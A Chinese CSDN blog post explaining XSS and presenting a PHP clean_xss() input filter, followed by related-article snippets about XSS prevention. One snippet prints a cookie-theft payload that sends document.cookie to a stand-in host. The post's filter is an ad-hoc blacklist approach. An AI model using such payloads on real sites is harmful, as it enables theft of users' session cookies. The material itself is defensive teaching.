什么XSS攻击?PHP防止XSS攻击函数

最新推荐文章于 2024-04-24 05:00:00 发布
最新推荐文章于 2024-04-24 05:00:00 发布
阅读量728 收藏
点赞数
分类专栏: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zf766045962/article/details/64905600
版权

XSS 全称为 Cross Site Scripting,用户在表单中有意或无意输入一些恶意字符,从而破坏页面的表现!

看看常见的恶意字符XSS 输入:

1.XSS 输入通常包含 JavaScript 脚本,如弹出恶意警告框:

2.XSS 输入也可能是 HTML 代码段,譬如:

(1).网页不停地刷新

(2).嵌入其它网站的链接


防止XSS攻击测试路径:

什么XSS攻击?PHP防止XSS攻击函数

 

其实有很多测试XSS攻击的工具:

  • Paros proxy (http://www.parosproxy.org)
  • Fiddler (http://www.fiddlertool.com/fiddler)
  • Burp proxy (http://www.portswigger.net/proxy/)
  • TamperIE (http://www.bayden.com/dl/TamperIESetup.exe)

对于PHP开发者来说,如何去防范XSS攻击呢?php防止xss攻击的函数

可以用如下函数: 

 
  
  1.  
  2.  function clean_xss(&$string, $low = False)
  3.  {
  4.  if (! is_array ( $string ))
  5.  {
  6.  $string = trim ( $string );
  7.  $string = strip_tags ( $string );
  8.  $string = htmlspecialchars ( $string );
  9.  if ($low)
  10.  {
  11.  return True;
  12.  }
  13.  $string = str_replace ( array ('"', "\\", "'", "/", "..", "../", "./", "//" ), '', $string );
  14.  $no = '/%0[0-8bcef]/';
  15.  $string = preg_replace ( $no, '', $string );
  16.  $no = '/%1[0-9a-f]/';
  17.  $string = preg_replace ( $no, '', $string );
  18.  $no = '/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S';
  19.  $string = preg_replace ( $no, '', $string );
  20.  return True;
  21.  }
  22.  $keys = array_keys ( $string );
  23.  foreach ( $keys as $key )
  24.  {
  25.  clean_xss ( $string [$key] );
  26.  }
  27.  }
  28.  //just a test
  29.  $str = 'phpddt.com';
  30.  clean_xss($str); //如果你把这个注释掉,你就知道xss攻击的厉害了
  31.  echo $str;
  32.  
 
 
 
 
 
 

   通过clean_xss()就过滤了恶意内容! 
 
 


                

        

        

    

  


    

      

        

            

              
                
                  1Goer
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
有效预防xss_预防XSS攻击的一些方法整理

				
			

			

				

					weixin_29069575的博客
				

				

					01-17
					
					3105
					
				

			

		

		

			
				
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。常见...

			
		

	



                

            
              



	

		

			

				
					
PHP中如何防范跨站脚本攻击(XSS)?有哪些防护措施?

					
最新发布

				
			

			

				

					aronSandy的博客
				

				

					04-25
					
					1304
					
				

			

		

		

			
				
通过综合运用这些措施,可以显著降低XSS攻击的风险,并提升应用程序的整体安全性。攻击者将恶意脚本注入到用户提交的表单字段、URL参数或其他可编辑的内容中,当用户访问被污染的页面时,恶意脚本将在用户的浏览器中执行。例如,设置Content-Security-Policy(CSP)响应头可以限制页面中允许加载的外部资源,从而防止恶意脚本的注入和执行。同时,使用PHP的内置函数(如htmlspecialchars()、strip_tags()等)对输入数据进行过滤,可以转义或删除可能引发XSS攻击的字符和标签。

			
		

	



              


  
              

                


	

		

			

				
					
php xss过滤

				
			

			

				

					NewHope, NewLife
				

				

					06-21
					
					6451
					
				

			

		

		

			
				
zz from: http://thinkblog.sinaapp.com/?p=72
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,进而达到某些人的攻击目的。
下面是thinkphp里面的一段代码,用于过滤xss
ThinkPHP\Code\Thi

			
		

	





	

		

			

				
					
PHP如何防止XSS攻击XSS攻击原理的讲解

				
			

			

				

					10-17
				

			

		

		

			
				
为有效防止XSS攻击PHP开发者可以采取以下几种措施:  1. 输入过滤:在用户输入数据时,要对其进行验证和清理。可以使用PHP内置函数strip_tags()去除HTML标签,htmlspecialchars()函数将特殊字符转换为HTML实体,...

			
		

	



		

			
		



	

		

			

				
					
PHP常用工具函数小结【移除XSS攻击、UTF8与GBK编码转换等】

				
			

			

				

					10-17
				

			

		

		

			
				
本文将主要介绍PHP中用于移除XSS攻击函数,以及进行UTF-8与GBK编码转换的方法。  首先,我们来探讨PHP中的函数用于移除XSS攻击。这类函数通常能够识别并清除输入字符串中潜在的恶意代码,保障Web应用的安全性。从...

			
		

	





	

		

			

				
					
php过滤XSS攻击函数

				
			

			

				

					10-26
				

			

		

		

			
				
为了防御PHP站点遭受XSS攻击,我们可以采用PHP编程语言实现的一系列过滤函数XSS攻击,全称为跨站脚本攻击(Cross-site Scripting),是一种常见的网络攻击手段,攻击者通过在网页中注入恶意脚本,窃取用户数据或者...

			
		

	





	

		

			

				
					
php xss防范函数,PHP防范XSS跨站脚本攻击的函数使用教程

				
			

			

				

					weixin_39544333的博客
				

				

					03-16
					
					141
					
				

			

		

		

			
				
跨站脚本攻击都是由于对用户的输入没有进行严格的过滤造成的,所以我们必须在所有数据进入我们的网站和数据库之前把可能的危险拦截。针对非法的HTML代码包括单双引号等,可以使用htmlentities() 。$str = "A 'quote' is bold";// 输出: A 'quote' is <b>bold</b>echo htmlentities($str);// 输出...

			
		

	





	

		

			

				
					
防止XSS攻击解决办法

				
			

			

				

					01-20
				

			

		

		

			
				
防止XSS攻击简单实用的解决办法,直接复制两个过滤器,然后配置web.xml即可实现

			
		

	





	

		

			

				
					
php 防止 XSS 攻击

				
			

			

				

					m0_37724558的博客
				

				

					03-19
					
					151
					
				

			

		

		

			
				
XSS又称CSS,全称Cross SiteScript(跨站脚本攻击), XSS攻击类似于SQL注入攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所以容易被忽略其危害性。
其原理是攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。如,盗取用户Cookie信息、破坏页面结构、重定向到其它网站等。
理论上,只要存在能提供输入的表单并且没做安全过滤或过滤不彻底,都有可能存在XSS漏洞。
下面是一些最简单并且比较

			
		

	





	

		

			

				
					
php 防止XSS攻击

				
			

			

				

					yang_yun_hao的博客
				

				

					11-14
					
					229
					
				

			

		

		

			
				

    // 其实就是过滤从表单提交来的数据,使用php过滤函数就可以达到很好的目的。
	
    if (isset($_POST['name'])){  
        $str = trim($_POST['name']);  //清理空格  
        $str = strip_tags($str);   //过滤html标签  
        $str = htmlspeci...

			
		

	





	

		

			

				
					
PHP 安全:如何防止PHP中的XSS

				
			

			

				

					新华编程特战队
				

				

					04-24
					
					1214
					
				

			

		

		

			
				
跨站点脚本(XSS) 是一种严重的安全漏洞,允许恶意行为者将恶意脚本引入网站,使毫无戒心的访问者处于危险之中。使用 XSS,攻击者可以在受害者的 Web 浏览器中执行任意代码,可能导致敏感数据被盗、未经授权的访问或网站污损。本文旨在深入探讨 XSS 攻击的主要形式,阐明其根本原因,探索 XSS 利用的潜在后果,并深入了解防止 PHPXSS 攻击的有效措施。当恶意行为者成功将有害脚本插入受信任的网站时,就会发生跨站脚本(XSS) 攻击。这些受感染的网站在不知不觉中将注入的脚本提供给毫无戒心的用户。

			
		

	





	

		

			

				
					
PHP防御XSS攻击

				
			

			

				

					Lisam Blog
				

				

					12-15
					
					2459
					
				

			

		

		

			
				
XSS即跨站脚本工具


例如我在你的评论上写了
alert('楼主傻逼');




然后很有可能就会弹出楼主傻逼了,当然这只是恶作剧,但要是别人在你的获取cookie就很严重了,如下
document.location="http://www.test.com/a.php?b="+document.cookie;
通过这种方式,你的所有cookie就会被发送到对应的网站去

			
		

	





	

		

			

				
					
php如何防止xss攻击

				
			

			

				

					weixin_54963682的博客
				

				

					03-11
					
					685
					
				

			

		

		

			
				
php如何防止xss攻击
php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。
在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。
所以使用htmlspecialchar函数时尽量加上第二个参数,htmlspecialchar(string,ENTQUOTES)转化单引号和双引号,如果不需要编译任何的

			
		

	





	

		

			

				
					
PHP如何防止XSS攻击

				
			

			

				

					qq_37913859的博客
				

				

					07-07
					
					483
					
				

			

		

		

			
				
PHP防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等,使用htmlspecialchars()函数 。
在使用htmlspecialchars()函数的时候注意第二个参数, 直接用htmlspecialchars($string) 的话,第二个参数默认是ENT_COMPAT,函数默认只是转化双引号(“), 不对单引号(‘)做转义.
所以,htmlspecialchars函数更多的时候要加上第二个参数, 应该这样用: htmlspecialchars(string,ENTQUOTES).

			
		

	





	

		

			

				
					
php面试题怎么防止xss攻击,php如何防止xss攻击

				
			

			

				

					weixin_32277761的博客
				

				

					03-13
					
					187
					
				

			

		

		

			
				
php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。所以使用htmlspecialchar函数时尽量加上第二个参数,htmlspecialc...

			
		

	





	

		

			

				
					
防范PHP攻击:SQL注入与XSS防护策略

				
			

			

				

					
				

			

		

		

			
				
为了防止XSS攻击,开发人员应:  - **过滤用户输入**:在输出任何用户提交的数据之前,应对其进行适当的清理和验证。例如,使用`htmlspecialchars()`函数转义特殊HTML字符,以阻止脚本执行。  - **限制JavaScript...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值